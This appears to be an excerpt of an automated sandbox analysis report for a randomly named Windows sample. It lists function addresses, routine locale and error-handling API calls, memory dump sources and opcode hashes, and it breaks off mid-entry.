                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                                                            • Opcode ID: 7b34ee248fed0754d8519af66273283c89f65f307f352271749f6f3daaed1215
                                                                                                                                                                                                                            • Instruction ID: 5285d22116e382dad619e53dcaf43ed2b29b13b406be5ec45926e77e10cab073
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b34ee248fed0754d8519af66273283c89f65f307f352271749f6f3daaed1215
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40C1D234A00649AFCF29CF68C4946BEBBF1BF1A310F25462DE456D72A2C731AD46CB51
                                                                                                                                                                                                                            Function 001B03F5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001B0449
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                                                            • Opcode ID: 62a51a023d749424fdb8f312cd1ebe6900ad80b9ccc36b7da527f058863b2981
                                                                                                                                                                                                                            • Instruction ID: d6c8d0a6c791cd1b7ad46f8e9eafa894e018aac24c836269a939483180ec7018
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62a51a023d749424fdb8f312cd1ebe6900ad80b9ccc36b7da527f058863b2981
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22219F72A04206AFDB299B65DC42AFB73ACEF59310F10407EFA05D6181EB74ED449B50
                                                                                                                                                                                                                            Function 001B007C Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(001B01A2,00000001,00000000,?,-00000050,?,001B07D3,00000000,?,?,?,00000055,?), ref: 001B00EE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                            • Opcode ID: 6e5d1838826d7044e9203366a1adf96ea3d5f8c98c0acc08fa496f280985531e
                                                                                                                                                                                                                            • Instruction ID: 9016d28d7e6fed38c8975dfec27e753e118b41a653017441648500a5ffd223a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5d1838826d7044e9203366a1adf96ea3d5f8c98c0acc08fa496f280985531e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D011E53B6007059FDB1CAF39C8916BBB792FF84358B14442DEA8687B40D771A942CB40
                                                                                                                                                                                                                            Function 001B0624 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001B03BE,00000000,00000000,?), ref: 001B0650
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                                                            • Opcode ID: 89e582dc9455027add66b72f6345c04536106de88f3973fecdd9d48c7181f6e3
                                                                                                                                                                                                                            • Instruction ID: c8a9cc8bfac9bbac6bdd05aa56cb87048d7b404420f0bcf8b4ea69316bad009d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89e582dc9455027add66b72f6345c04536106de88f3973fecdd9d48c7181f6e3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F0A4B6A00211ABDB295B65CC05BFB7768EB84764F16442AEC06A3180EB74FF51CAD0
                                                                                                                                                                                                                            Function 001B0117 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(001B03F5,00000001,?,?,-00000050,?,001B0797,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 001B0161
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                            • Opcode ID: e1a73ad0e1a5dc834723effe0505f9bd0a565237d52cd06bab887cd129c55117
                                                                                                                                                                                                                            • Instruction ID: 452a4a02d09fb015941af9861fbef346d5faa3f2b7edbbe0fc08babcfa2a2e4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1a73ad0e1a5dc834723effe0505f9bd0a565237d52cd06bab887cd129c55117
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0C2363043046FDB296F39D885ABB7B91EB85368F05842CFA454B6A0D7B19C41C650
                                                                                                                                                                                                                            Function 001A7026 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A0E12: EnterCriticalSection.KERNEL32(?,?,001A8A8B,?,001C07B0,00000008,001A8C4F,?,0019EE66,?), ref: 001A0E21
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(001A7019,00000001,001C0750,0000000C,001A73EB,00000000), ref: 001A705E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                                                            • Opcode ID: f88fb1fc625eac6ddcfc7d05a96c9cd88ae3a40b9509f20f98812360b3556d91
                                                                                                                                                                                                                            • Instruction ID: 22682ea7ccca93c1ca2c48537d40cb65041aa00ee4a9f834d2fcff4e0a9fccfb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f88fb1fc625eac6ddcfc7d05a96c9cd88ae3a40b9509f20f98812360b3556d91
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F0493AA04304EFDB10EF98E956B9D77F0FB29725F00452AF810DB2A1DBB599019F41
                                                                                                                                                                                                                            Function 001B0031 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(001AFF8A,00000001,?,?,?,001B07F5,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001B0068
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                            • Opcode ID: f1a28e50510f2adfafdd6557e3dba8373eaa19a456a69516926bf7503256d0dd
                                                                                                                                                                                                                            • Instruction ID: 7a544f000b832f5787bb522bd376f75d6baab8e72cfb0fa0db7ce7579f4131b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1a28e50510f2adfafdd6557e3dba8373eaa19a456a69516926bf7503256d0dd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAF0E53A30020557CB09AF75D8557AA7F94EFC6750B06406DFA098B691C7759843CB90
                                                                                                                                                                                                                            Function 001A74EF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001A5AEE,?,20001004,00000000,00000002,?,?,001A50F0), ref: 001A7523
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: 6a0ad92dd9961125b6c10bd0c08d153ebee824286c643e595617c2e4e03da848
                                                                                                                                                                                                                            • Instruction ID: c4e1390c2443c0fe3382939d186e2bd3827621527759b1965e9ea804ceaad0b9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a0ad92dd9961125b6c10bd0c08d153ebee824286c643e595617c2e4e03da848
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03E08639904229BBCF123F61DC04E9E7F15EF55762F054110FC05652A1CB358F61AAD5
                                                                                                                                                                                                                            Function 0019A212 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000A21E,00199799), ref: 0019A217
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                            • Opcode ID: 3f40731a33ebcd54b958437d5a6afba503a4673f43feb9149c03c1cb49740208
                                                                                                                                                                                                                            • Instruction ID: a4ef9a4f628a3372a0f05917b71c4a6b4da15cd5359ed0e4ea3f9a9b42e0cfb1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f40731a33ebcd54b958437d5a6afba503a4673f43feb9149c03c1cb49740208
                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                            Function 001AE177 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                            • Opcode ID: a7eb11995acee23deb67c8952e3bdffea2d4dacdb801e6561279306ba8d21de1
                                                                                                                                                                                                                            • Instruction ID: b6466f96f0dff8bb70ec4ccbbb7c14a89d4cfc076ee0ccfb859b7f02baa4a9ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7eb11995acee23deb67c8952e3bdffea2d4dacdb801e6561279306ba8d21de1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFA011322002808BA3208F38AA082083AA8BB88A8230A0028A028C2020EB2880A08A00
                                                                                                                                                                                                                            Function 001EEDDE Relevance: .5, Instructions: 489COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 8a0cbe5cf4f3c382501015eb38ca5360e31d3c13d09ca3a9ee6b95cccfefd4dd
                                                                                                                                                                                                                            • Instruction ID: faebe8031e94f00a09142a14be60357b643525a035eb8b3759f86c0bdbae6ac9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a0cbe5cf4f3c382501015eb38ca5360e31d3c13d09ca3a9ee6b95cccfefd4dd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8027F33D5AAF34B8B764EFA44D423A7EA05E01B5131F46A9DEC07F196C312ED0696E0
                                                                                                                                                                                                                            Function 001EFDCB Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                            • Instruction ID: 483a4d0df9a009e064965ced6dfe54e0b227bc876500166125ec91ef69bceb14
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35C16F73D4F9F3058B76466E041823EEEA26E91B4131FC3A9DDD03F18AC726AD1696D0
                                                                                                                                                                                                                            Function 001EF9E3 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
